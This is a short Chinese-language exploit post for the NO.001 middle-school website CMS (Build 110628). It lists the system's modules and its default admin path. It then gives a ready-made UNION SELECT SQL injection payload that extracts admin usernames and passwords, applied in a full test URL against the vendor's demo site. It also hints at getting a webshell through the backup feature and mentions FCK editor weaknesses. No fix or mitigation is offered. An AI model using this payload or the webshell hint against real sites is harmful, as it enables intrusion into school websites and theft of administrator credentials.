NO.001中学网站管理系统漏洞

漏洞名称:NO.001中学网站管理系统 Build 110628 注入漏洞

NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
4.视频图片管理:一级分类,动态添加视频或者图片等信息
5.留言管理:对留言,修改,删除、回复等管理
6.校友频道:包括校友资料excel导出、管理等功能
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页

默认后台:admin/login.asp

官方演示:http://demo.001cms.net

源码下载地址:http://down.chinaz.com/soft/30187.htm

EXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin

测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin

getwebshell:后台有备份,你懂的

另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。

作者Mr.DzY由网络安全攻防研究室(www.91ri.org)最新漏洞小组收集整理.